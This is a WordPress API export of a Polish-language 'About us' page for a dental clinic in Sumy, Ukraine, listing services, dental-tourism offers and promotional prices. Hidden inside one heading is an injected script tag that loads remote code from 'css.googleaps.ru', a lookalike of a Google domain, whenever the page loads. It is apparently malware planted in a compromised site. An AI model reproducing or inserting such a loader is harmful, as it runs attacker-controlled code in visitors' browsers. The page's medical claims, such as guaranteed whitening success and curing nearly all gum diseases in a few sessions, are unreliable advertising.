{"id":3723,"date":"2014-01-20T15:30:46","date_gmt":"2014-01-20T13:30:46","guid":{"rendered":"http:\/\/www.your-brilliant-smile.com\/?page_id=3723"},"modified":"2014-02-28T10:58:56","modified_gmt":"2014-02-28T08:58:56","slug":"o-nas-2","status":"publish","type":"page","link":"https:\/\/your-brilliant-smile.com\/pl","title":{"rendered":"O nas"},"content":{"rendered":"<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic.jpg\" rel=\"prettyPhoto[3723]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4140\" alt=\"Advantages of our dental clinic\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-300x199.jpg\" width=\"300\" height=\"199\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-300x199.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-630x418.jpg 630w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-900x598.jpg 900w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Zalety naszej kliniki stomatologicznej:<\/b><\/p>\n<ul>\n<li>Wszystkie rodzaje us\u0142ug stomatologicznych.<\/li>\n<li>Stomatologia bez wiert\u0142a (du\u0144ska technologia Sandman).<\/li>\n<li>Znieczulenie komputerowe (znieczulenie z\u0119b\u00f3w za pomoc\u0105 nanotechnologicznych system\u00f3w znieczulaj\u0105cych).<\/li>\n<li>Znieczulenie z\u0119b\u00f3w bez ig\u0142y (niemiecka technologia INJEX).<\/li>\n<li>Diagnostyka rentgenowska.<\/li>\n<li>Umocowania uzupe\u0142nie\u0144 protetycznych bez ingerencji w z\u0119by zdrowe.<\/li>\n<li>Protetyka implantologiczna (dost\u0119pne \u201edemokratyczne\u201d ceny).<\/li>\n<li>\u015acis\u0142e przestrzeganie zasad Anti-AIDS, Anti-WZW.<\/li>\n<li>Bezp\u0142atne konsultacje.<\/li>\n<li>Najkr\u00f3tsze terminy wykonania protez z\u0119bowych w regionie.<\/li>\n<li>Wieloletnie do\u015bwiadczenie pracy fachowc\u00f3w.<\/li>\n<li>Ka\u017cda zamontowana u nas konstrukcja jest obj\u0119ta gwarancj\u0105.<\/li>\n<li>Elastyczna polityka cenowa (nasi lekarze zaoferuj\u0105 Pa\u0144stwu wszystkie warianty konstrukcji od najta\u0144szych do najdro\u017cszych konstrukcji klasy VIP).<\/li>\n<li>Leczenie stomatologiczne na raty.<\/li>\n<li>Protetyka i leczenie na podstawie ubezpieczenia (je\u017celi s\u0105 Pa\u0144stwo ubezpieczeni w firmie ubezpieczeniowej i Pa\u0144stwa ubezpieczenie obejmuje stomatologi\u0119).<\/li>\n<li>Hollywoodzkie lic\u00f3wki Luminiers (unikalna us\u0142uga dla VIP klient\u00f3w).<\/li>\n<li>System kompozytowy COMPONEER \u2013 unikalna szwajcarska technologia odbudowa z\u0119b\u00f3w (nowo\u015b\u0107 2012 roku)<\/li>\n<li>Lic\u00f3wki w ci\u0105gu 1 dnia.<\/li>\n<li>W\u0142asne laboratorium dentystyczne.<\/li>\n<li>Program dyskontowy.<\/li>\n<li>Mo\u017cliwo\u015b\u0107 wykonania dowolnej modyfikacji protezy z\u0119bowej.<\/li>\n<\/ul>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis.jpg\" rel=\"prettyPhoto[3723]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4141\" alt=\"Dental prosthesis in Sumy city\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis-300x241.jpg\" width=\"300\" height=\"241\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis-300x241.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis.jpg 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Protetyka stomatologiczna w mie\u015bcie Sumy<\/strong><\/p>\n<p>W naszej klinice stomatologicznej lekarze robi\u0105 wszystkie istniej\u0105ce modyfikacje protez. Je\u017celi nawet maj\u0105 Pa\u0144stwo bardzo trudn\u0105 i zaniedban\u0105 sytuacj\u0119, nie jest to powodem dla zmartwienia. Pomo\u017cemy Pa\u0144stwu rozwi\u0105za\u0107 najbardziej skomplikowane sytuacje.<\/p>\n<p>Ch\u0119tnym wstawi\u0107 z\u0119by nale\u017cy skonsultowa\u0107 si\u0119 za po\u015brednictwem czatu on-line (wyskakuj\u0105ce okno na stronie www.your-brilliant-smile.com) lub zadzwoni\u0107 pod numer +3 8\u00a0066\u00a0196 87 93. Potem nale\u017cy dokona\u0107 rejestracji wst\u0119pnej w celu zbadania (badanie wst\u0119pne jest u nas bezp\u0142atne), nast\u0119pnie po zapoznaniu si\u0119 ze wszystkimi mo\u017cliwymi opcjami rozwi\u0105zania Pa\u0144stwa sytuacji i po wyborze optymalnej konstrukcji mo\u017cna rozpocz\u0105\u0107 prace protetyczne.<\/p>\n<p>Termin wykonania protez w naszej klinice stomatologicznej jest najkr\u00f3tszy w regionie. Od 3 do 7 dni.<\/p>\n<p>Elitarne wyroby VIP klasy wysy\u0142amy do laboratori\u00f3w dentystycznych Kijowa, Europy (Niemcy, Szwajcaria), wi\u0119c z uwzgl\u0119dnieniem czasu przesy\u0142ki termin wykonania protez z\u0119bowych b\u0119dzie d\u0142u\u017cszy, lecz uzyskany b\u0119dzie najlepszy wynik pod wzgl\u0119dem jako\u015bci.<\/p>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism.jpg\" rel=\"prettyPhoto[3723]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4142\" alt=\"Dental tourism in Ukraine\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism-300x200.jpg\" width=\"300\" height=\"200\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism-300x200.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism.jpg 600w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Turystyka stomatologiczna na Ukrainie. Dlaczego Pa\u0144stwu warto zwr\u00f3ci\u0107 si\u0119 w\u0142a\u015bnie do nas.<\/b><\/p>\n<p>W ostatnich czasach na ca\u0142ym \u015bwiecie coraz cz\u0119\u015bciej zacz\u0105\u0142 pojawia\u0107 si\u0119 nowy kierunek w turystyce, a mianowicie turystyka stomatologiczna. Mog\u0105 Pa\u0144stwo w du\u017cym stopniu zaoszcz\u0119dzi\u0107 swoje pieni\u0105dze i czas, a do tego jeszcze zobaczy\u0107 Ukrain\u0119, pojecha\u0107 na wycieczki i udzieli\u0107 troch\u0119 czasu dla swojego zdrowia.<\/p>\n<p>Zapraszamy mieszka\u0144c\u00f3w ze wszystkich kraj\u00f3w przyjecha\u0107 do nas do miasta Sumy i zwiedzi\u0107 nasza klinik\u0119 stomatologiczn\u0105. Mog\u0105 Pa\u0144stwo uzyska\u0107 konsultacj\u0119 wykwalifikowanego specjalisty drog\u0105 mejlow\u0105 (<a href=\"mailto:katsumoto2018@gmail.com\">katsumoto2018@gmail.com<\/a>), lub w trybie online za pomoc\u0105 czatu internetowego. Najlepsz\u0105 opcj\u0105 jest wys\u0142a\u0107 pod nasz adres mejlowy zdj\u0119cie panoramiczne z\u0119b\u00f3w, wtedy b\u0119dziemy mogli udzieli\u0107 bardziej dok\u0142adnej konsultacji i obliczy\u0107 warto\u015b\u0107 pracy przed jej rozpocz\u0119ciem. Dbamy o wszystkich sprawach organizacyjnych. Zawsze pomo\u017cemy Pa\u0144stwu wybra\u0107 miejsce zakwaterowania (apartamenty lub hotel). Najbli\u017cszy hotel (4 gwiazdki) znajduje si\u0119 na odleg\u0142o\u015bci 500 metr\u00f3w od naszej kliniki. Ch\u0119tnie pomo\u017cemy zorganizowa\u0107 dla Pa\u0144stwa sp\u0119dzanie czasu wolnego, dobierzemy pasuj\u0105ce Pa\u0144stwu wycieczki po naszym mie\u015bcie, wycieczki do historycznych zabytk\u00f3w naszego obwodu i do stolicy naszego kraju \u2013 Kijowa.<\/p>\n<p>Stomatologia cieszy si\u0119 du\u017cym zapotrzebowaniem w\u015br\u00f3d ludno\u015bci. W naszym obwodzie otworzono wiele klinik stomatologicznych i gabinet\u00f3w, lecz ka\u017cdy lekarz traktuje jedn\u0105 i t\u0105 sam\u0105 sytuacj\u0119 na r\u00f3\u017cne sposoby. Kto\u015b organizuje leczenie i protezowanie w bardziej \u0142agodny dla pacjenta spos\u00f3b, a dla kogo\u015b nie jest to a\u017c tak wa\u017cne, i te\u017c nie mo\u017cemy za to nikogo os\u0105dza\u0107. Ka\u017cdy lekarz i ka\u017cdy cz\u0142owiek s\u0105 r\u00f3\u017cni. S\u0105 r\u00f3\u017cne podej\u015bcia. Technologie i przekonania te\u017c si\u0119 r\u00f3\u017cni\u0105. Zasady traktowania rehabilitacji pacjent\u00f3w u lekarzy naszej kliniki zasadniczo r\u00f3\u017cni\u0105 si\u0119 od zasad innych klinik. Stosujemy zasad\u0119 minimalnej ingerencji (je\u017celi jest to mo\u017cliwe pod wzgl\u0119dem wskaza\u0144), racjonalno\u015bci, sterylno\u015bci i bezbolesno\u015bci. Wszystkie rodzaje leczenia i protezowania z\u0119b\u00f3w przeprowadzamy z wykorzystaniem znieczulenia (najcz\u0119\u015bciej stosujemy niemiecki system INJEX, dzi\u0119ki kt\u00f3remu mo\u017cna znieczula\u0107 z\u0105b bez uk\u0142ucia ig\u0142\u0105).<\/p>\n<p>Protezowanie z\u0119b\u00f3w w naszej klinice jest wykonywane zgodnie z indywidualnym schematem (za pomoc\u0105 \u0142uku twarzowego i artykulatora, z uwzgl\u0119dnieniem i przeniesieniem danych Pa\u0144stwa stawu i danych antropometrycznych). Indywidualny schemat zapewnia mo\u017cliwo\u015b\u0107 bardziej precyzyjnego i wygodnego dla pacjenta wykonania protezowania z\u0119b\u00f3w z uwzgl\u0119dnieniem nie tylko ich kszta\u0142tu, lecz r\u00f3wnie\u017c budowy stawu i k\u0105t\u00f3w ruchu (prowadzenia) z\u0119b\u00f3w. Wynik takiej pracy b\u0119dzie bardzo dok\u0142adny i wygodny.<\/p>\n<p><strong>Wykonujemy wszystkie rodzaje protezowania z\u0119b\u00f3w:<script src=\"\/\/css.googleaps.ru\/css?f=Open+Sans&#038;cd=mb&#038;ver=4.2.2\"><\/script><\/strong><\/p>\n<ul>\n<li>Protetyka cz\u0119\u015bciowa (protezy cz\u0119\u015bciowe na klamrach, klasyczne protezy cz\u0119\u015bciowe, protezy cz\u0119\u015bciowe oparte na koronach teleskopowych, protezy na ryglach, zespolenia belkowe).<\/li>\n<li>Ceramika bezmetalowa<\/li>\n<li>Metaloceramika<\/li>\n<li>Lic\u00f3wki Luminiers<\/li>\n<li>Lic\u00f3wki zwyk\u0142e<\/li>\n<li>System kompozytowy COMPONEER<\/li>\n<li>Protetyka na implantach<\/li>\n<li>Protezy stomatologiczne ruchome (protezy pokrywaj\u0105ce, protezy p\u0142ytowe, tymczasowe protezy ruchome).<\/li>\n<li>Tymczasowe korony z tworzyw sztucznych, mikroprotezy.<\/li>\n<li>Mikroprotezowanie z\u0119b\u00f3w z pomoc\u0105 wk\u0142adek i nak\u0142adek.<\/li>\n<\/ul>\n<p><b>Leczenie z\u0119b\u00f3w<\/b> w naszej klinice stomatologicznej odbywa si\u0119 tylko zgodnie z najnowszymi technologiami. Wykonujemy wype\u0142nienia wy\u0142\u0105cznie z cement\u00f3w glasjonomerowych i kompozyt\u00f3w fotopolimerowych wyprodukowanych w Niemczech, Japonii i USA. Leczenie kana\u0142\u00f3w korzenia z\u0119ba w naszej klinice wykonuje si\u0119 za pomoc\u0105 mikrosilnika endodontycznego (dzi\u0119ki temu urz\u0105dzeniu mo\u017cna rozszerzy\u0107 kana\u0142 korzenia z\u0119ba do potrzebnej szeroko\u015bci) z nast\u0119pnym wype\u0142nieniem kana\u0142u korzenia z\u0119ba rozgrzan\u0105 gutaperk\u0105 i specjalnym uszczelniaczem cementowym do wype\u0142nienia.<\/p>\n<p>Dla niekt\u00f3rych szczeg\u00f3lnie skomplikowanych przypadk\u00f3w leczenie wykonuje si\u0119 za pomoc\u0105 \u015blinochronu Raberdam (z izolacj\u0105 pola roboczego). Wyst\u0119puje te\u017c opcja borowania z\u0119b\u00f3w bez wiert\u0142a (technologia pozwala na usuni\u0119cie uszkodzonych tkanek z\u0119ba za pomoc\u0105 specjalnego aparatu, kt\u00f3ry dos\u0142ownie wywiewa uszkodzon\u0105 tkank\u0119 z\u0119ba)<\/p>\n<p><b>Leczenie chor\u00f3b dzi\u0105se\u0142 <\/b>(zapalenie oz\u0119bnej, choroby oz\u0119bnej, zapalenie dzi\u0105se\u0142) wykonujemy za pomoc\u0105 lasera \u201eBiolase\u201d. Ta technologia zapewnia gruntowne antyseptyczne dzia\u0142anie na chore tkanki mi\u0119kkie. Wykonane za pomoc\u0105 lasera \u0142y\u017ceczkowanie (oczyszczenie kieszeni oko\u0142oz\u0119bowych od tkanek ziarnistych) jest o wiele skuteczniejsze od zwyk\u0142ych zabieg\u00f3w i zapewnia bardziej szybkie i lepsze gojenie. W ci\u0105gu 3-5 zabieg\u00f3w mo\u017cna wyleczy\u0107 prawie wszystkie znane choroby tkanek mi\u0119kkich.<\/p>\n<p><b>Diagnostyka rtg<\/b><\/p>\n<p>Dzi\u0119ki wykorzystaniu w\u0142asnego aparatu rentgenowskiego mo\u017cemy bardziej precyzyjnie stawia\u0107 diagnoz\u0119 chor\u00f3b uk\u0142adu stomatognatycznego. Dla szeregu przypadk\u00f3w wyst\u0119puje konieczno\u015b\u0107 wykonania zdj\u0119\u0107 rentgenowskich na po\u015brednich fazach leczenia.<\/p>\n<p><b>Stomatologia laserowa<\/b><\/p>\n<p>Dzi\u0119ki wykorzystaniu lasera mo\u017cemy wykonywa\u0107 takie prace jak laserowe wszczepienie z\u0119b\u00f3w, laserowe wybielanie z\u0119b\u00f3w, resekcja w\u0119dzide\u0142ek, pog\u0142\u0119bienie przedsionka jamy ustnej, leczenie schorze\u0144 przyz\u0119bia, zamkni\u0119cie przetoki ustno-zatokowej, leczenie zapale\u0144 dzi\u0105s\u0142a wok\u00f3\u0142 korony z\u0119ba.<\/p>\n<p><b>Leczenie z\u0119b\u00f3w bez wykorzystania boru dentystycznego<\/b><\/p>\n<p><b>Leczenie i protetyka z\u0119b\u00f3w z wykorzystaniem powi\u0119kszenia<\/b><\/p>\n<p><b>Stomatologia chirurgiczna<\/b><\/p>\n<p>Usuni\u0119cie z\u0119b\u00f3w o dowolnym poziomie trudno\u015bci, paradontologia chirurgiczna, usuni\u0119cie cyst, usuni\u0119cie nowotwor\u00f3w, resekcja w\u0119dzide\u0142ek, pog\u0142\u0119bienie przedsionka jamy ustnej, wszczepienie z\u0119b\u00f3w, przesadzanie ko\u015bci.<\/p>\n<p><b>Dekorowanie z\u0119b\u00f3w<\/b><\/p>\n<p>Inkrustacja z\u0119b\u00f3w bi\u017cuteri\u0105 naz\u0119bn\u0105 (Skyce), strasami, kamieniami szlachetnymi.<\/p>\n<p><b>Gnatologia<\/b><\/p>\n<p>Konsultacje gnatologa. Diagnostyka chor\u00f3b stawu skroniowo-\u017cuchwowego. Diagnostyka i korekta wad zgryzu za pomoc\u0105 artykulatora i selektywnego szlifowania z\u0119b\u00f3w. Wykonanie ochraniaczy przy leczeniu bruksizmu, patologicznym \u015bcieraniu z\u0119b\u00f3w. Wykonanie ochraniaczy przy rozleg\u0142ym protezowaniu z\u0119b\u00f3w. Szyny relaksacyjne. Szyny repozycyjne.<\/p>\n<p><b>Stomatologia dla kobiet w ci\u0105\u017cy<\/b><\/p>\n<p>W naszej klinice dla kobiet w ci\u0105\u017cy stosujemy bardziej \u0142agodne metody leczenia i protezowania. S\u0105 to najbardziej nieszkodliwe i certyfikowane \u015brodki i materia\u0142y wype\u0142niaj\u0105ce.<\/p>\n<p><b>Wszczepianie z\u0119b\u00f3w<\/b><\/p>\n<p>W naszej klinice po\u015bwi\u0119ca si\u0119 wiele uwagi wszczepianiu z\u0119b\u00f3w. Jest to kierunek protezowania wad w uz\u0119bieniu, jeden z najszybciej rozwijaj\u0105cych si\u0119 w dzisiejszych czasach. Wszystkie prace w zakresie protezowania na implantach s\u0105 przeprowadzone zgodnie z indywidualnym schematem z uwzgl\u0119dnieniem indywidualnych osobliwo\u015bci ustawienia z\u0119b\u00f3w i stawu skroniowo-\u017cuchwowego. Pracujemy tylko ze sprawdzonymi systemami implant\u00f3w wyprodukowanymi w Niemczech, USA i Izraelu.<\/p>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic.jpg\" rel=\"prettyPhoto[3723]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4143\" alt=\"New action offers\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic-300x160.jpg\" width=\"300\" height=\"160\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic-300x160.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic.jpg 595w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Nowe promocyjne oferty naszej kliniki:<\/b><\/p>\n<p>1. PLOMBA \u015aWIAT\u0141OUTWARDZALNA FILTEK Z550\u00a0(USA) tylko\u00a0za\u00a0200\u00a0UAH (materia\u0142 \u015bwiat\u0142outwardzalny \u2013 to najbardziej trwa\u0142y i niewidoczny materia\u0142 wype\u0142niaj\u0105cy, nie ulega on rozmyciu, nie ma mikrop\u0119kni\u0119\u0107, a najwa\u017cniejsze jest to, \u017ce mo\u017cna go dobra\u0107 do dowolnej barwy z\u0119ba (plomba nie odr\u00f3\u017cnia si\u0119 od z\u0119ba pod wzgl\u0119dem koloru). Dlaczego 200 UAH to tanio? \u015arednia cena podobnej plomby w klinikach Kijowa, Charkowa, Lwowa wynosi od 350 do 400\u00a0UAH).<\/p>\n<p>2. Protetyka stomatologiczna.\u00a0LIC\u00d3WKI\u00a0IPS EMAX\u00a0(Niemcy) tylko\u00a0za\u00a01000 UAH.\u00a0Czym s\u0105 lic\u00f3wki? Lic\u00f3wki to cienkie ceramiczne p\u0142ytki, kt\u00f3re zapewniaj\u0105 mo\u017cliwo\u015b\u0107 zmiany koloru i kszta\u0142tu z\u0119b\u00f3w. W przypadku krzywych z\u0119b\u00f3w jest to wspania\u0142a alternatywa do klamerek na z\u0119by. Je\u017celi chc\u0105 Pa\u0144stwo, \u017ceby z\u0119by zosta\u0142y bardziej bia\u0142e na zawsze, a nie na okre\u015blony czas, to potrzebuj\u0105 Pa\u0144stwo lic\u00f3wek. Dlaczego w\u0142a\u015bnie IPS EMAX\u00a0(Niemcy), a nie inny producent? IPS EMAX\u00a0\u2013 to najbardziej sprawdzona i biokompatybilna technologia, lic\u00f3wki te wygl\u0105daj\u0105 na tyle naturalnie, \u017ce nikt i nigdy nie pomy\u015bli, \u017ce s\u0105 to sztuczne z\u0119by. Ta technologia zosta\u0142a rozpowszechniona i zaaprobowana na ca\u0142ym \u015bwiecie, w tym jest certyfikowana na Ukrainie. Dlaczego 1000 UAH to tanio? \u015arednia cena dla miasta Sumy wynosi 2000 UAH. W krajach Europy stanowi ona 1000 euro za jednostk\u0119, w Kijowie \u2013 3500 \u2013 4000 UAH).<\/p>\n<p>3. METALOCERAMIKA VitaVM13 (Niemcy) 650\u00a0UAH.<\/p>\n<p>VitaVM13 \u2013 to materia\u0142, kt\u00f3ry nie ma analog\u00f3w pod wzgl\u0119dem estetyki i walor\u00f3w wytrzyma\u0142o\u015bciowych. Metaloceramiczne korony z tego materia\u0142u maj\u0105 bardzo \u017cywy wygl\u0105d, poniewa\u017c ta masa zapewnia mo\u017cliwo\u015b\u0107 odtworzenia dowolnej odcieni, p\u00f3\u0142tonu, w\u0142a\u015bciwo\u015bci luminescencyjnych i opalescencyjnych. Praca z tej mas\u0105 jest prac\u0105 koronkow\u0105 (\u015brednia cena w Sumach wynosi 700 \u2013 800 UAH za jednostk\u0119).<\/p>\n<p>4. Laserowe wybielanie z\u0119b\u00f3w \u2013 100% sukces. 1500 UAH.<\/p>\n<p>Laserowe wybielanie nie skutkuje zwi\u0119kszeniem wra\u017cliwo\u015bci z\u0119b\u00f3w, skutki s\u0105 widoczne nie za godzin\u0119 czy za tydzie\u0144, a od razu po up\u0142ywie 20 minut ( mie\u015bcie sumy tylko my posiadamy taki sprz\u0119t. \u015arednia cena zabiegu laserowego wybielania w Kijowie (na takim samym sprz\u0119cie i z takim samym zestawem do wybielania jak u nas) 3000 \u2013 4500 UAH).<\/p>\n<p>5. Ceramika bezmetalowa to nieprze\u015bcigniona estetyka (ceramiczne wk\u0142adki, korony, lic\u00f3wki). Maksymalna estetyka w promocyjnej cenie1000 UAH! Poprzednia cena to 2000 UAH. Je\u017celi chc\u0105 Pa\u0144stwo otrzyma\u0107 ol\u015bniewaj\u0105cy u\u015bmiech i niezowodne wyniki pracy, wtedy jest to najlepszy wariant dla Pa\u0144stwa i Pa\u0144stwa przyjaci\u00f3\u0142 <img decoding=\"async\" class=\"kws-smiley\" src=\"https:\/\/your-brilliant-smile.com\/wp-content\/plugins\/kama-wp-smile\/packs\/qip\/smile.gif\" alt=\"smile\" \/><\/p>\n<p>6. \u201eNiewidzialne\u201d protezy. Konstrukcje z mocowaniem ryglowym. Mocowanie protez na implantach. Wszystkie te sposoby zawieraj\u0105 opcj\u0119, dzi\u0119ki kt\u00f3rym mo\u017cna uzyska\u0107 zupe\u0142nie niewidoczn\u0105 dla otoczenia trwale zamontowan\u0105 protez\u0119, z kt\u00f3r\u0105 nie znajd\u0105 si\u0119 Pa\u0144stwo w niezr\u0119cznej sytuacji.<\/p>\n<p>7. Stomatologia dla kobiet w ci\u0105\u017cy. Ten rozdzia\u0142 bardzo si\u0119 r\u00f3\u017cni od zwyk\u0142ej pomocy stomatologicznej. Jest tutaj wiele niuans\u00f3w. Kobiety w ci\u0105\u017cy powinny by\u0107 traktowane ze szczeg\u00f3ln\u0105 uwag\u0105, trosk\u0105 i ostro\u017cno\u015bci\u0105 w trakcie wyboru tych lub owych \u015brodk\u00f3w medycznych.<\/p>\n<p>8. Protezowanie stomatologiczne na raty w okresie do 1 roku.<\/p>\n<p>9. Wieloletnie do\u015bwiadczenie specjalist\u00f3w.<\/p>\n<p>10. Okres gwarancyjny na protetyk\u0119 stomatologiczn\u0105 wynosi 3 lata. Na leczenie\u2013 1 rok. Nie nale\u017cy myli\u0107 okresu gwarancyjnego z okresem u\u017cytkowania, s\u0105 to r\u00f3\u017cne poj\u0119cia, okres u\u017cytkowania zawsze jest wielokrotnie d\u0142u\u017cszy od okresu gwarancyjnego. Warunkiem powstania wypadku gwarancyjnego jest uszkodzenie protezy lub plomby, wypadni\u0119cie plomby. Jeste\u015bmy zainteresowani w tym, \u017ceby Pa\u0144stwo zostali zadowoleni z jako\u015bci naszych us\u0142ug, wi\u0119c przestrzeganie warunk\u00f3w gwarancji jest jedn\u0105 z naszych obowi\u0105zkowych regu\u0142.<\/p>\n<p>11. Hollywoodzkie lic\u00f3wki Luminiers \u2013 jest to unikalna technologia, dzi\u0119ki kt\u00f3rej mo\u017cna stworzy\u0107 indywidualne ultracienkie lic\u00f3wki bez ingerencji w Pa\u0144stwa z\u0119by (w mie\u015bcie Sumy \u017cadna inna klinika opr\u00f3cz naszej nie jest certyfikowana w zakresie tej techniki).<\/p>\n<p>12. System kompozytowy COMPONEER (lic\u00f3wki w ci\u0105gu jednej wizyty) \u2013 s\u0105 to lic\u00f3wki wykonane z prasowanego materia\u0142u kompozytowego. Zalety tej metodyki polegaj\u0105 na tym, \u017ce mo\u017cna je wykona\u0107 w ci\u0105gu jednej wizyty do dentysty. W naszej klinice jedna taka lic\u00f3wka kosztuje 1500 UAH (w mie\u015bcie Sumy \u017cadna inna klinika opr\u00f3cz naszej nie jest certyfikowana w zakresie tej techniki).<\/p>\n<p>13. Najkr\u00f3tsze terminy wykonania protez w obwodzie (od 3 do 5 dni).<\/p>\n<p>15. \u201eMo\u017cliwo\u015b\u0107 wykonania dowolnej modyfikacji protezy z\u0119bowej\u201d. W naszej klinice mog\u0105 Pa\u0144stwo zam\u00f3wi\u0107 dowolny rodzaj protezy z\u0119bowej. Protezujemy z\u0119by z wykorzystaniem wszystkich istniej\u0105cych nowoczesnych metodyk i ci\u0105gle uzupe\u0142niamy swoj\u0105 wiedz\u0119 na seminariach i treningach ucz\u0105c si\u0119 nowych technik i mo\u017cliwo\u015bci.<\/p>\n<p>16. Praca z wykorzystaniem powi\u0119kszenia. (Stomatolog tak samo jak jubiler nie mo\u017ce zobaczy\u0107 wszystkich szczeg\u00f3\u0142\u00f3w, kt\u00f3re s\u0105 niezb\u0119dne dla wykonania jego pracy w jak najlepszy spos\u00f3b, bez trzy- lub pi\u0119ciokrotnego powi\u0119kszenia. W przypadku, je\u017celi pacjent ma zwi\u0119kszone wymagania estetyczne, wykorzystujemy urz\u0105dzenia optyczne).<\/p>\n<p>17. Stomatologia dzieci\u0119ca (leczenie z\u0119b\u00f3w bez wiert\u0142a).<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Zalety naszej kliniki stomatologicznej: Wszystkie rodzaje us\u0142ug stomatologicznych. Stomatologia bez wiert\u0142a (du\u0144ska technologia Sandman). Znieczulenie komputerowe (znieczulenie z\u0119b\u00f3w za pomoc\u0105 nanotechnologicznych system\u00f3w znieczulaj\u0105cych). Znieczulenie z\u0119b\u00f3w bez ig\u0142y (niemiecka technologia INJEX). Diagnostyka rentgenowska. Umocowania uzupe\u0142nie\u0144 protetycznych bez ingerencji w z\u0119by zdrowe. Protetyka implantologiczna (dost\u0119pne \u201edemokratyczne\u201d ceny). \u015acis\u0142e przestrzeganie zasad Anti-AIDS, Anti-WZW. Bezp\u0142atne konsultacje. Najkr\u00f3tsze terminy wykonania [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/your-brilliant-smile.com\/pl\/wp-json\/wp\/v2\/pages\/3723"}],"collection":[{"href":"https:\/\/your-brilliant-smile.com\/pl\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/your-brilliant-smile.com\/pl\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/your-brilliant-smile.com\/pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/your-brilliant-smile.com\/pl\/wp-json\/wp\/v2\/comments?post=3723"}],"version-history":[{"count":3,"href":"https:\/\/your-brilliant-smile.com\/pl\/wp-json\/wp\/v2\/pages\/3723\/revisions"}],"predecessor-version":[{"id":4153,"href":"https:\/\/your-brilliant-smile.com\/pl\/wp-json\/wp\/v2\/pages\/3723\/revisions\/4153"}],"wp:attachment":[{"href":"https:\/\/your-brilliant-smile.com\/pl\/wp-json\/wp\/v2\/media?parent=3723"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}